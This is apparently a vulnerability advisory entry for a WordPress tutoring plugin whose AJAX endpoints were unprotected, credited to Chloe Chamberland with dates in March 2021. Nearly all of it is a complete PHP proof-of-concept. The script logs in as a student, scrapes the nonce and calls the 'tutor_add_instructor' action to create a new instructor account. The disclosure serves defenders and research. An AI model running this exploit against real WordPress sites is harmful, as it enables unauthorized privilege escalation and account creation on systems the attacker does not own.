Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.
Only one PoC provided for privilege escalation. <?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // 1) Log in as customer $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/index.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match('/var\stutor_data\s=\s{"delete_confirm_text"\:"Are you sure\?\sit\scan\snot\sbe\sundone\."\,"nonce_key"\:"_wpnonce","_wpnonce":"([^"]+)"/', $content, $matches); $nonce = $matches[1]; print_r($nonce); // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'first_name' => 'Instructor', 'last_name' => 'Instructor', 'user_login' => 'Instructor', 'email' => '[email protected]', 'phone_number' => '1234567890', 'password' => 'test', 'password_confirmation' => 'test', 'tutor_profile_bio' => '', 'action' => 'tutor_add_instructor', '_wpnonce' => $nonce ]); $output = curl_exec($ch); curl_close($ch); print_r($output);
Chloe Chamberland
Chloe Chamberland
Yes
2021-03-15 (about 2 years ago)
2021-03-15 (about 2 years ago)
2021-03-20 (about 2 years ago)